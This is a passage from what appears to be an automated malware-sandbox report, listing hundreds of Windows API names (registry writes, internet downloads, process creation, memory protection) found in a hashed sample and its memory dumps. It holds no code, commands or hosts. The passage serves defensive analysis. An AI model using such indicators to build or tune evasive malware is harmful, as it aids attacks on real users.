(Indicator: \"GetSystemWindowsDirectoryW\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"GetCurrentThreadId\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"SetLastError\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"InterlockedIncrement\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"SysStringLen\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"SysAllocStringLen\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"SysAllocString\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"SysFreeString\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"CommandLineToArgvW\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"UnregisterClassA\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"LoadStringW\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"TranslateMessage\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"DispatchMessageW\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"RtlAllocateHeap\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"RtlFreeHeap\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"CoInitializeEx\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"ProgIDFromCLSID\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"CoCreateInstance\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"CoInitializeSecurity\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"CoUninitialize\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"CoTaskMemFree\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"CLSIDFromString\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API (Indicator: \"AddAce\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"InitializeAcl\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetSecurityDescriptorControl\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"MakeAbsoluteSD\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetSecurityDescriptorSacl\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetSecurityDescriptorDacl\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetSecurityDescriptorGroup\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetSecurityDescriptorOwner\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"InitializeSecurityDescriptor\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetLengthSid\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"IsValidSid\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"CopySid\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetAclInformation\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"SetSecurityDescriptorOwner\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"SetSecurityDescriptorGroup\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"SetSecurityDescriptorDacl\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetSidSubAuthority\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"InitializeSid\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetSidLengthRequired\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"IsValidSecurityDescriptor\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetLastError\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"Sleep\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetCommandLineW\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"SetThreadUILanguage\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"CloseHandle\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"WaitForSingleObject\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"RaiseException\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"InitializeCriticalSection\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"DeleteCriticalSection\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"InterlockedIncrement\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"InterlockedDecrement\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"CreateThread\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"CreateEventW\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetModuleHandleW\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetCurrentThreadId\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"SetEvent\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"LocalFree\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"ExitProcess\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"WaitForMultipleObjects\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"OpenEventW\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"lstrlenW\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"EnterCriticalSection\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"LeaveCriticalSection\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetModuleFileNameW\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"OutputDebugStringW\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"DispatchMessageW\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"TranslateMessage\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"LoadStringW\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"RtlUnwind\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"CoInitializeSecurity\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"CoInitializeEx\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"CoUninitialize\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"CoTaskMemFree\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"ProgIDFromCLSID\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"CoCreateInstance\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"CLSIDFromString\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"CommandLineToArgvW\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"RegCloseKey\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"RegQueryValueExW\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"HeapDestroy\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"HeapAlloc\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"HeapFree\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"HeapReAlloc\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"HeapSize\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetProcessHeap\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetVersionExA\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"InterlockedExchange\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"InterlockedCompareExchange\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetStartupInfoA\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"OutputDebugStringA\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"SetUnhandledExceptionFilter\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetModuleHandleA\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"QueryPerformanceCounter\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetTickCount\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetCurrentProcessId\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetSystemTimeAsFileTime\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"TerminateProcess\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"UnhandledExceptionFilter\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"FormatMessageW\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"LoadResource\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"FindResourceExW\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"FreeLibrary\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetProcAddress\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"CreateFileW\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetSystemDirectoryW\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"LoadLibraryW\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetFullPathNameW\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetVersionExW\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetSystemWindowsDirectoryW\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetModuleHandleExW\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetFileAttributesW\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"UnregisterClassA\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"RegOpenKeyExW\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"SetLastError\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"LoadLibraryExW\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"MapViewOfFile\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"CreateFileMappingW\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetLocaleInfoW\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"UnmapViewOfFile\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetSystemDefaultUILanguage\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetUserDefaultUILanguage\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"SearchPathW\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"RtlAllocateHeap\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"RtlFreeHeap\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetACP\"; Source: \"00000000-00001432.00000000.76300.00160000.00000004.mdmp, 00000000-00001432.00000001.77907.00160000.00000004.mdmp, 00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"LoadLibraryA\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetProcAddress\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"VirtualAlloc\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"VirtualFree\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegSetValueExA\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegQueryValueExA\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegOpenKeyExA\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegCreateKeyA\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegOpenKeyA\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegCloseKey\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetAdaptersInfo\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetStringTypeA\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"LCMapStringW\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"WaitForSingleObject\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"CreateThread\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"HeapFree\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"DeleteFileA\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"ExitProcess\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"lstrcmpiA\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"lstrcatA\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetWindowsDirectoryA\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"HeapAlloc\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetProcessHeap\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"Sleep\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetModuleFileNameA\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"CloseHandle\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetLastError\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"CreateMutexA\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"HeapReAlloc\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetTickCount\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"FindClose\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"FindFirstFileA\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"TerminateProcess\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"CreateProcessA\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"CreateFileA\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"ReadFile\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"WriteFile\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"FlushFileBuffers\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetFileSize\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"LCMapStringA\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetStringTypeW\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"MultiByteToWideChar\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetOEMCP\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetCPInfo\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"RtlUnwind\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"SetUnhandledExceptionFilter\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"IsBadReadPtr\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"IsBadWritePtr\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"IsBadCodePtr\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetStdHandle\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"WideCharToMultiByte\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetOpenA\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetSetOptionExA\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetOpenUrlA\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetCloseHandle\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetReadFile\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"wsprintfA\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"VirtualProtect\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetModuleHandleA\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetLastActivePopup\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetActiveWindow\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"MessageBoxA\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"ShellExecuteExA\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"LoadLibraryA\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetProcAddress\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"VirtualAlloc\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"VirtualFree\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"RegSetValueExA\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"RegQueryValueExA\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"RegOpenKeyExA\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"RegCreateKeyA\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"RegOpenKeyA\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"RegCloseKey\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetAdaptersInfo\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetStringTypeA\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"LCMapStringW\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"WaitForSingleObject\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"CreateThread\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"HeapFree\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"DeleteFileA\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"ExitProcess\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"lstrcmpiA\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"lstrcatA\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetWindowsDirectoryA\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"HeapAlloc\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetProcessHeap\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"Sleep\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetModuleFileNameA\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"CloseHandle\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetLastError\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"CreateMutexA\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"HeapReAlloc\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetTickCount\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"FindClose\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"FindFirstFileA\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"TerminateProcess\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"CreateProcessA\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"CreateFileA\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"ReadFile\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"WriteFile\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"FlushFileBuffers\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetFileSize\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"LCMapStringA\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetStringTypeW\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"MultiByteToWideChar\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetOEMCP\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetACP\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n 